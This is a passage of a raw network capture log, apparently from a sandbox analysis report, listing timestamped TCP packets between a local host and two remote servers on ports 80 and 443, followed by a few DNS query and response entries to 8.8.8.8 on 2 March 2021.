                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.734450102 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.734461069 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.734468937 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.734471083 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.734685898 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735002995 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735028028 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735049009 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735073090 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735075951 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735101938 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735122919 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735145092 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735168934 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735189915 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735191107 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735205889 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735209942 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735213995 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735235929 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735254049 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735261917 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735387087 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735528946 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735951900 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735975027 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.735996962 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736020088 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736046076 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736068010 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736087084 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736108065 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736123085 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736129999 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736133099 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736152887 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736174107 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736195087 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736196995 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736207008 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736213923 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736896992 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736920118 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736943007 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736959934 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736965895 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.736989021 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.737010956 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.737031937 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.737032890 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.737060070 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.737082958 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.737082005 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.737090111 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744457006 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744478941 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744501114 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744524002 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744549036 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744570971 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744584084 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744591951 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744610071 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744616985 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744638920 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744647026 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744662046 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744683027 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744704962 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744788885 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744813919 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.744826078 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745420933 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745444059 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745469093 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745491028 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745511055 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745533943 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745554924 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745574951 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745589018 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745599031 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745608091 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745610952 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745621920 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745646954 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745668888 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745671034 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.745780945 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746361971 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746390104 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746412039 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746433020 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746454000 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746464014 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746470928 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746476889 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746500015 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746520996 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746542931 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746567011 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746589899 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746592999 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746598005 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746611118 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.746983051 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747034073 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747281075 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747303963 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747324944 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747348070 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747375965 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747397900 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747417927 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747438908 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747459888 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747471094 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747483969 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747499943 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747514009 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747541904 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747569084 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.747586012 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748233080 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748255968 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748275995 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748298883 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748323917 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748346090 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748367071 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748383045 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748388052 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748409986 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748409986 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748418093 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748433113 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748456001 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748462915 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748476982 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748553991 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.748578072 CET4972980192.168.2.4104.21.59.148
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749155998 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749178886 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749197960 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749214888 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749242067 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749264002 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749284029 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749305010 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749326944 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749346972 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.749366999 CET8049729104.21.59.148192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.449348927 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.450567961 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.450622082 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.450668097 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.450786114 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.451761007 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.451788902 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.451879025 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.453016043 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.453041077 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.454257011 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.454288006 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.454405069 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.454417944 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.455502987 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.455527067 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.455677986 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.456749916 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.456784964 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.456895113 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.457983971 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.458013058 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.458164930 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.459240913 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.459261894 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.460484982 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.460506916 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.461857080 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.465909004 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.465944052 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.465965033 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.465991020 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.466020107 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.466046095 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.466072083 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.466088057 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.466123104 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.466156006 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.467636108 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.471870899 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.471910000 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.472290993 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.472337008 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.472466946 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.472484112 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.473314047 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.475007057 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.475055933 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.475110054 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.475477934 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.475518942 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.475563049 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.476481915 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.476517916 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.477464914 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.477572918 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.477631092 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.479979038 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.487143993 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.487196922 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.487301111 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.487548113 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.487591982 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.487729073 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.488389015 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.488435030 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.489962101 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.490307093 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.490346909 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.490489960 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.492074013 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.492109060 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.492432117 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.492465019 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.492480040 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.492564917 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.493256092 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.493288994 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.493323088 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.495757103 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.495794058 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.496136904 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.496171951 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.497020960 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.497078896 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.497111082 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.497339010 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.498231888 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.498274088 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.498315096 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.499525070 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.499556065 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.499588013 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.507541895 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.507589102 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.507735968 CET49734443192.168.2.499.86.159.34
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.507884026 CET4434973499.86.159.34192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.507930040 CET4434973499.86.159.34192.168.2.4

                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.836925030 CET5233753192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.869771004 CET53615228.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.882772923 CET53523378.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:08:59.884916067 CET5504653192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:08:59.930783033 CET53550468.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:01.005407095 CET4961253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:01.064692020 CET53496128.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:01.994808912 CET4928553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:02.040421963 CET53492858.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:03.993841887 CET5060153192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:04.042778015 CET53506018.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:05.597374916 CET6087553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:05.645148039 CET53608758.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:05.799443007 CET5644853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:05.845248938 CET53564488.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.235846043 CET5917253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.237066031 CET6242053192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.239526033 CET6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.282471895 CET53591728.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.285128117 CET53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.286020041 CET53624208.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.903247118 CET5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.949892044 CET53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:09.930087090 CET6153153192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:09.978732109 CET53615318.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:10.032285929 CET4922853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:10.103822947 CET53492288.8.8.8192.168.2.4
